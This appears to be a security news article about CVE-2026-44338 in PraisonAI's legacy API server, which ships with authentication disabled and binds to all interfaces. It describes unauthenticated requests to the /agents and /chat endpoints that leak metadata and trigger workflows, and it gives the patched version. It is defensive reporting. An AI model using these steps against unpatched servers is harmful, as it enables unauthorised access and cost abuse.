PraisonAI Vulnerability Exploited Hours After Public Disclosure
Artificial intelligence frameworks are rapidly integrating into core enterprise operations. However, a critical vulnerability within a popular AI platform has exposed organizations to significant...
Artificial intelligence frameworks are rapidly integrating into core enterprise operations. However, a critical vulnerability within a popular AI platform has exposed organizations to significant security risks from threat actors.
Within hours of public disclosure, a severe vulnerability in PraisonAI’s legacy API server, tracked as CVE-2026-44338, is already sending shockwaves through the developer community.
By shipping with authentication disabled by default, the framework essentially hands over the keys to its internal workflows.
This architectural misstep allows anyone on the network to hijack automated agent operations, execute tasks, and drain expensive API quotas without ever presenting a valid credential.
PraisonAI Vulnerability Exploit
The root cause of this high-severity flaw lies deep within the shipped legacy Flask API server, specifically targeting the src/praisonai/api_server.py entrypoint.
Security researchers discovered that the codebase relies on hard-coded insecure defaults, explicitly setting AUTH_ENABLED = False and AUTH_TOKEN = None.
Because the underlying check_auth() function fails open by design when authentication is disabled, any incoming request automatically bypasses the standard security gates.
Compounding the risk, when this script is launched directly, it binds to 0.0.0.0:8080.
This exposes the vulnerable, unprotected endpoints to all reachable network interfaces rather than isolating them to local environments.
The framework’s deployment subsystem also mirrors this insecure setup, generating sample deployment configurations that recommend open host bindings alongside disabled authentication.
Threat actors can seamlessly exploit this oversight by targeting two primary endpoints without supplying an Authorization header.
A simple GET request to the /agents route allows unauthenticated enumeration of the configured agent metadata, giving attackers immediate visibility into the system’s operational scope.
More critically, sending a POST request to /chat instantly triggers the system’s local agents.yaml workflow.
According to GitHub Advisories GHSA-6rmh-7xcm-cpxj, the flaw allows external attackers to repeatedly trigger pre-configured automated workflows, despite not enabling direct prompt injection.
Attackers can effortlessly extract sensitive output data returned by the system and force the victim’s infrastructure to exhaust costly external AI model quotas through repeated execution.
PraisonAI maintainers have released version 4.6.34 to patch this vulnerability. Developers utilizing the pip package must update their environments immediately to prevent active exploitation.
Furthermore, security engineers are strongly advised to transition away from the legacy API server and utilize the newer serve agents command.
This modern deployment path is secure by default, binding locally to 127.0.0.1 and requiring an –api-key argument for access, which effectively neutralizes the threat of unauthenticated intrusion.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.